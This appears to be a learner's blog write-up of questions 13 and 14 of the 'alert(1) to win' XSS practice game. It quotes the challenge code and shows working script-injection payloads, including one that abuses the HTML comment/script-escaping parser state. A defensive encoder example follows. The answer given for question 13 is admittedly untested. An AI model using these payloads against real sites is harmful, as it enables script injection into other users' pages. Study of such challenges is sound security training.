Question 13
Problem:

    function escape(s) {
      var tag = document.createElement('iframe');

      // For this one, you get to run any code you want, but in a "sandboxed" iframe.
      //
      // https://4i.am/?...raw=... just outputs whatever you pass in.
      //
      // Alerting from 4i.am won't count.

      s = '<script>' + s + '<\/script>';
      tag.src = 'https://4i.am/?:XSS=0&CT=text/html&raw=' + encodeURIComponent(s);

      window.WINNING = function() { youWon = true; };

      tag.setAttribute('onload', 'youWon && alert(1)');
      return tag.outerHTML;
    }
Analysis:
Old Black did not solve this one and only knows that the answer is name='youWon'. According to the answers found online, each frame has a global object, window, and name is a member property of window that stores the window's name. Old Black's guess is that entering name='youWon' will trigger alert(1), but when it was tried against the experimental URL no alert appeared.
Question 14
Problem:

     1 function escape(s) {
     2   function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); }
     3   function html(s) { return s.replace(/[<>"&]/g, function(s) {
     4                         return '&#' + s.charCodeAt(0) + ';'; }); }
     5
     6   return (
     7     '<script>' +
     8       'var url = ' + json(s) + '; // We\'ll use this later' +
     9     '</script>\n\n' +
    10     '  <!-- for debugging -->\n' +
    11     '  URL: ' + html(s) + '\n\n' +
    12     '<!-- then suddenly -->\n' +
    13     '<script>\n' +
    14     '  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' +
    15     '  else new Image().src = url;\n' +
    16     '</script>'
    17   );
    18 }
Analysis:
alert(1) has to fire where line 11 is, so the payload has to end up inside <script></script>.
Attempts:
First attempt: "alert(1);" failed.
Second attempt: after checking references I learned about the HTML5 "script data escaped state" feature. Using <!--<script> makes the parser treat what follows it as JS, which cancels out the </script> on line 9, so the payload becomes "alert(1);<!--<script>". The result is:

     1 <script>var url = "alert(1);<!--<script>"; // We'll use this later</script>
     2
     3   <!-- for debugging -->
     4   URL: alert(1);&#60;!--&#60;script&#62;
     5
     6 <!-- then suddenly -->
     7 <script>
     8   if (!/^http:.*/.test(url)) console.log("Bad url: " + url);
     9   else new Image().src = url;
    10 </script>

The code actually in effect at this point is:

    1 <script>var url = "alert(1);
    2
    3 <!-- for debugging -->
    4 URL: alert(1);
    5 <!-- then suddenly -->
    6 <script>
    7 if (!/^http:.*/.test(url)) console.log("Bad url: " + url);
    8 else new Image().src = url;
    9 </script>

But there is still a problem: the <script> tag on line 6 also takes effect, and it causes a syntax error!
Third attempt: payload = "alert(1);/*<!--<script>*/if(/a//*". The syntax check passes and the output becomes:

     1 <script>var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*"; // We'll use this later</script>
     2
     3   <!-- for debugging -->
     4   URL: alert(1);/*&#60;!--&#60;script&#62;*/if(/a//*
     5
     6 <!-- then suddenly -->
     7 <script>
     8   if (!/^http:.*/.test(url)) console.log("Bad url: " + url);
     9   else new Image().src = url;
    10 </script>

With the ineffective code removed, what remains is:

    1 <script>var url = "alert(1);"
    2
    3 for debugging -->
    4 URL: alert(1);
    5 if (/a/.test(url)) console.log("Bad url: " + url);
    6 else new Image().src = url;
    7 </script>
PS: The above is Old Black's own understanding, for reference only.
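The parsing behaviour from Question 14, as an added example that is not part of the original post or of the challenge's code: a simplified model of the tokenizer's script-data states shows where the first script block really ends, once with the challenge's json() and once with an encoder that also escapes "<". The names jsonForScript, scriptEndIndex, pageAfterFirstScriptTag and endsWhereIntended, and the abridged page template, are assumptions made for illustration.

```javascript
// json() as given in the challenge: only "/" is escaped.
function challengeJson(s) {
  return JSON.stringify(s).replace(/\//g, '\\/');
}

// Hypothetical hardened encoder for inline <script>: "<", ">", "&" and "/"
// become \uXXXX, so no "<!--", "<script" or "</script" reaches the tokenizer.
function jsonForScript(s) {
  return JSON.stringify(s).replace(/[<>&\/\u2028\u2029]/g, function (c) {
    return '\\u' + ('0000' + c.charCodeAt(0).toString(16)).slice(-4);
  });
}

// Simplified model of the script data / escaped / double escaped states.
// Returns the index of the "</script" that really ends the element, or -1.
function scriptEndIndex(text) {
  var token = /<!--|-->|<\/?script(?=[\s\/>])/gi;
  var state = 'data';
  var m;
  while ((m = token.exec(text)) !== null) {
    var t = m[0].toLowerCase();
    if (t === '<!--') {
      if (state === 'data') state = 'escaped';
      token.lastIndex = m.index + 2;   // the "--" may also begin a "-->"
    } else if (t === '-->') {
      state = 'data';
    } else if (t === '<script') {
      if (state === 'escaped') state = 'double';
    } else if (state === 'double') {
      state = 'escaped';               // "</script" swallowed, block goes on
    } else {
      return m.index;                  // this "</script" ends the element
    }
  }
  return -1;
}

// Constructed, abridged text that follows the first "<script>" of the page.
function pageAfterFirstScriptTag(encode, s) {
  return 'var url = ' + encode(s) + "; // We'll use this later</script>\n\n" +
    '<!-- then suddenly -->\n<script>\n  new Image().src = url;\n</script>';
}

// True when the first block ends at the first "</script", as the template intends.
function endsWhereIntended(encode, s) {
  var text = pageAfterFirstScriptTag(encode, s);
  return scriptEndIndex(text) === text.indexOf('</script');
}
```

The hardened encoder's output is still valid JSON, so the script reads back the same string value.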
I do not understand the answers to questions 15 and 16; I will tackle those two once I know enough. If you have a link to an explanation online, please send it over.
Although I solved two problems this afternoon, I also wasted too much time: my efficiency was too low, my self-control was not good enough and my attention wandered. I am not satisfied with today's performance.
"20171027 in" alert(1) to win: questions 13, 14, 15 and 16